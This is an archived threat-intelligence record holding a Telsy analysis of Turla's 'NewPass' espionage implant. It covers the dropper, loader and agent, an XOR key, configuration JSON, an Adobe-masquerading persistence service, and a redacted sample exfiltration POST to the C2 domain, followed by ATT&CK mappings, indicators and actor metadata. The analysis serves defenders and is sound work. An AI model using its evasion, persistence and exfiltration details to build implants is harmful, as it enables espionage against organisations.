{
	"id": "bab05f73-3d7d-413b-bede-60d3ad0074ee",
	"created_at": "2026-04-06T00:22:07.821498Z",
	"updated_at": "2026-04-10T13:11:57.062146Z",
	"deleted_at": null,
	"sha1_hash": "8546d2803da2b86613ade68d8185aad6cd650fcc",
	"title": "Turla / Venomous Bear updates its arsenal: \"NewPass\" appears on the APT threat scene - Telsy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1482416,
	"plain_text": "Turla / Venomous Bear updates its arsenal: \"NewPass\" appears on the APT threat scene - Telsy\r\nBy widerview\r\nPublished: 2020-07-14 · Archived: 2026-04-05 14:44:31 UTC\r\n\r\nRecently Telsy observed some artifacts related to an attack that occurred in June 2020 and that is most likely linked to the well-known Russian Advanced Persistent Threat (APT) known as Venomous Bear (aka Turla or Uroburos). To the best of our knowledge, this time the group used a previously unseen implant, which we internally named \"NewPass\" after one of the parameters used to send exfiltrated data to the command and control.\r\n\r\nTelsy suspects this implant has been used to target at least one European Union country in the diplomacy and foreign affairs sector.\r\n\r\nNewPass is a fairly complex malware composed of several components that rely on an encoded file to pass information and configuration between each other. There are at least three components: a dropper, which deploys the binary file; a loader library, which decodes the binary file and extracts the last component; and that last component, the \"agent\", which performs specific operations such as communicating with the attackers' command and control server.\r\n\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 1 of 9\r\n\r\nThe loader and the agent share a JSON configuration resident in memory that demonstrates the potential of the malware and the ease with which the attackers can customize the implant by simply changing the values of the configuration entries.\r\n\r\nDropper Analysis\r\n\r\nThe first Windows library is huge, about 2.6 MB, and it is identified by the following hash:\r\n\r\nType   | Value\r\nSHA256 | e1741e02d9387542cc809f747c78d5a352e7682a9b83cbe210c09e2241af6078\r\n\r\nExploring the artifact with a static approach, it is possible to note that it exports a high number of functions, as shown in the following image.\r\n\r\nMost of the exported functions point to useless code and only LocalDataVer can be used as an entry point of the DLL; it is therefore the function to examine in order to understand the malicious behavior.\r\n\r\nAttackers likely used this trick to avoid sandbox analysis, as well as to make manual analysis slightly harder. Sandbox solutions will probably try to execute a DLL file using the rundll32.exe or regsvr32.exe utilities, with \"DllMain\" or \"DllRegisterServer\" as the entry point function. In this case, both of these functions cause the termination of the program without showing the real malware behavior.\r\n\r\nThe library's aim is to deploy the backdoor and its configuration file under two different folders, depending on the attacker's customization.\r\n\r\nAccording to what has been observed by our research team, the paths used in this case are the following:\r\n\r\nConfiguration Path                                                          | Backdoor Path\r\nProgramData\\Adobe\\ARM\\Reader_20.021.210_47.dat                              | C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\lib3DXquery.dll\r\nProgramData\\WindowsHolographic\\SpatialStore\\HolographicSpatialStore.swid | WindowsHolographicService.dll\r\n\r\nFor the second sample we weren't able to retrieve its dropper. Therefore, it is possible to obtain the location of the configuration file from which the backdoor tried to load its parameters, but not the exact location in which the dropper deployed the implant artifact.\r\n\r\nFurthermore, the paths used are very stealthy and it is easy to mistake the artifacts for components of legitimate programs, such as Adobe Reader or Windows Mixed Reality.\r\n\r\nIn particular, the path of the first sample is the same one used by the legitimate Adobe Reader installation, and therefore the lib3DXquery.dll file blends in perfectly with the other Adobe components, making it almost totally invisible.\r\n\r\nThe configuration file written to disk, at first glance, seems to be totally encrypted and incomprehensible without analyzing the next stage. The following image shows the configuration file in its raw form.\r\n\r\nLoader Analysis\r\n\r\nThe retrieved backdoor implants are identified by the following hashes:\r\n\r\nName                          | SHA256\r\nlib3DXquery.dll               | 6e730ea7b38ea80f2e852781f0a96e0bb16ebed8793a5ea4902e94c594bb6ae0\r\nWindowsHolographicService.dll | f966ef66d0510da597fec917451c891480a785097b167c6a7ea130cf1e8ff514\r\n\r\nOnce again, the libraries export several functions but only one is useful to execute their real payload.\r\n\r\nTo begin, the library checks for the presence of the associated configuration file; if it does not exist, the backdoor terminates its execution. Otherwise, once the file is found, the malware starts to decode and read the current configuration.\r\n\r\nThe first 5 bytes of the file contain the size of the data to read starting from the 6th byte; that data contains the first encoded information needed to allow the malware to load the entire configuration.\r\n\r\nAll the data retrieved in this first phase is encoded using a simple XOR algorithm with the fixed key 19 B9 20 5A B8 EF 2D A3 73 08 C1 53, hardcoded at the beginning of the function as represented in the following image.\r\n\r\nSo, the malware reads the first 5 bytes and decodes them using the key, obtaining the number of bytes it has to read to obtain the initial configuration.\r\n\r\nIn this specific case, from the decoded bytes it gets the value 00081.\r\n\r\nSo, it proceeds to read the next 81 bytes.\r\n\r\nDecoding these with the usual key, it obtains a string composed of different parameters separated by \"||\", as illustrated below.\r\n\r\nHowever, this is still not the final configuration used by the malware; it contains only the parameters to load the last malicious Windows library, named LastJournalx32.adf, containing the final agent.\r\n\r\nThis payload is hidden inside the configuration file after a section of random bytes used by the attackers to change the hash value of the file at every infection.\r\n\r\nDuring its activity, the loader decrypts and maintains in memory the complete configuration used during the infection chain.\r\n\r\nIt consists of different JSON formatted structures that look like the following:\r\n\r\n{\r\n    \"RefreshToken\": \"\",\r\n    \"NoInternetSleepTime\": \"3600\",\r\n    \"GetMaxSize\": \"60000\",\r\n    \"ClientId\": \"\",\r\n    \"DropperExportFunctionName\": \"LocalDataVer\",\r\n    \"Autorun\": \"16\",\r\n    \"ImgurImageDeletionTime\": \"120\",\r\n    \"RecoveryServers\": [],\r\n    \"RunDllPath\": \"%WinDir%\\\\\\\\System32\",\r\n    \"AgentLoaderExportFunctionName\": \"LocalDataVer\",\r\n    \"Key\": \"[…redacted…]\",\r\n    \"AgentName\": \"LastJournalx32.adf\",\r\n    \"UserAgent\": \"\",\r\n    […truncated…]\r\n\r\nThe structure contains all the information necessary for the loader to correctly launch the final agent. Some of these entries are AgentFileSystemName, AgentExportName and AgentName.\r\n\r\nThe agent shares the same memory space as the loader, so it is able to access the same configuration and extract the parameters it needs, such as the object named Credentials. The configuration also contains the domain name (newshealthsport[.]com) and the path (/sport/latest.php) of the command-and-control with which the agent will communicate.\r\n\r\nFrom the configuration it is also possible to notice the version number of the malware: specifically, it is 19.03.28 for the AgentLoader and 19.7.16 for the Agent.\r\n\r\nMoreover, the agent is identified by an ID stored in the AgentID entry, which is used during communication with the C2 as the identifier of the infected machine.\r\n\r\nThe configuration also embeds a specific structure for persistence mechanisms that appears as follows:\r\n\r\n{\r\n    \"Autoruns\": {\r\n        \"Service\": {\r\n            \"DisplayName\": \"Adobe Update Module\",\r\n            \"ServiceName\": \"Adobe Update Module\",\r\n            \"Enabled\": \"true\"\r\n        },\r\n        \"TaskScheduler\": {\r\n            \"Enabled\": \"false\"\r\n        },\r\n        \"Registry\": {\r\n            \"Enabled\": \"false\"\r\n        },\r\n        \"Policies\": {\r\n            \"Enabled\": \"false\"\r\n        }\r\n    }\r\n}\r\n\r\nThe implant supports different types of persistence mechanisms: through the Service Manager, through the Task Scheduler, via a Registry key or using Windows GPO.\r\n\r\nIn this specific case, attackers enabled the Service method, which allows the malware to interact with the SCManager to create a new service named Adobe Update Module pointing to the path of the loader.\r\n\r\nAgent Analysis\r\n\r\nThe last payload is identified by the following hash:\r\n\r\nType   | Value\r\nSHA256 | 08a1c5b9b558fb8e8201b5d3b998d888dd6df37dbf450ce0284d510a7104ad7f\r\n\r\nIt is responsible for exfiltrating information from the infected machine, sending it to the command-and-control and downloading new commands to be executed.\r\n\r\nTo make the communication with the C2 stealthier, the agent uses a set of keywords to separate the data within a POST request. The keywords are specified by the attackers during the development phase.\r\n\r\nIn the analyzed case, they are the following:\r\n\r\ndbnew\r\ncontentname\r\nnewpass\r\npassdb\r\ndata_src\r\nserver_login\r\ntable_data\r\ntoken_name\r\nserver_page\r\ntargetlogin\r\n\r\nSo, during the exfiltration phase, the HTTP requests appear as reported below:\r\n\r\nPOST /sport/latest.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\nHost: newshealthsport. com\r\nContent-Length: 170\r\nConnection: Keep-Alive\r\n\r\nnewpass=[redacted]&server_page=[redacted]&passdb=[redacted]&targetlogin=t&table_data=[redacted]\r\n\r\nAll the values embedded in the request are encrypted, probably using one of the keys embedded in the configuration described above. The algorithm used during the encryption phase is most probably a custom one.\r\n\r\nBelow, we report a simple scheme of the described infection chain, highlighting the three components of this new threat: the dropper, the loader and the agent.\r\n\r\nPersistence\r\n\r\nAs mentioned above, the malware is able to create services or tasks or to add registry keys to achieve persistence. In the analyzed case, the loader component is set to create a new Windows service, specifying its path location as ImagePath.\r\n\r\nATT&CK Matrix\r\n\r\nTechnique | Tactic              | Description\r\nT1204     | Execution           | Threat actor relies upon specific actions by a user in order to gain execution\r\nT1060     | Persistence         | Threat actor adds an entry to the \"run keys\" in the Registry or startup folder so that the program will be executed when a user logs in\r\nT1053     | Persistence         | Threat actor uses Windows Task Scheduler to schedule programs or scripts to be executed at a date and time\r\nT1543     | Persistence         | Adversaries create or modify Windows services to repeatedly execute malicious payloads as part of persistence\r\nT1073     | Defense Evasion     | Programs specify DLLs that are loaded at runtime\r\nT1132     | Command and Control | Command and control (C2) information is encoded using a standard data encoding system\r\nT1001     | Command and Control | Command and control (C2) communications are hidden in an attempt to make the content more difficult to discover or decipher\r\nT1041     | Exfiltration        | Threat actor relies on command and control infrastructure to exfiltrate data\r\n\r\nIndicators of Compromise\r\n\r\nType   | Value\r\nSHA256 | e1741e02d9387542cc809f747c78d5a352e7682a9b83cbe210c09e2241af6078\r\nSHA256 | 6e730ea7b38ea80f2e852781f0a96e0bb16ebed8793a5ea4902e94c594bb6ae0\r\nSHA256 | 08a1c5b9b558fb8e8201b5d3b998d888dd6df37dbf450ce0284d510a7104ad7f\r\nSHA256 | f966ef66d0510da597fec917451c891480a785097b167c6a7ea130cf1e8ff514\r\nDomain | newshealthsport. com\r\nURL    | http://newshealthsport. com/sport/latest.php",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/"
	],
	"report_names": [
		"turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434927,
	"ts_updated_at": 1775826717,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8546d2803da2b86613ade68d8185aad6cd650fcc.pdf",
		"text": "https://archive.orkl.eu/8546d2803da2b86613ade68d8185aad6cd650fcc.txt",
		"img": "https://archive.orkl.eu/8546d2803da2b86613ade68d8185aad6cd650fcc.jpg"
	}
}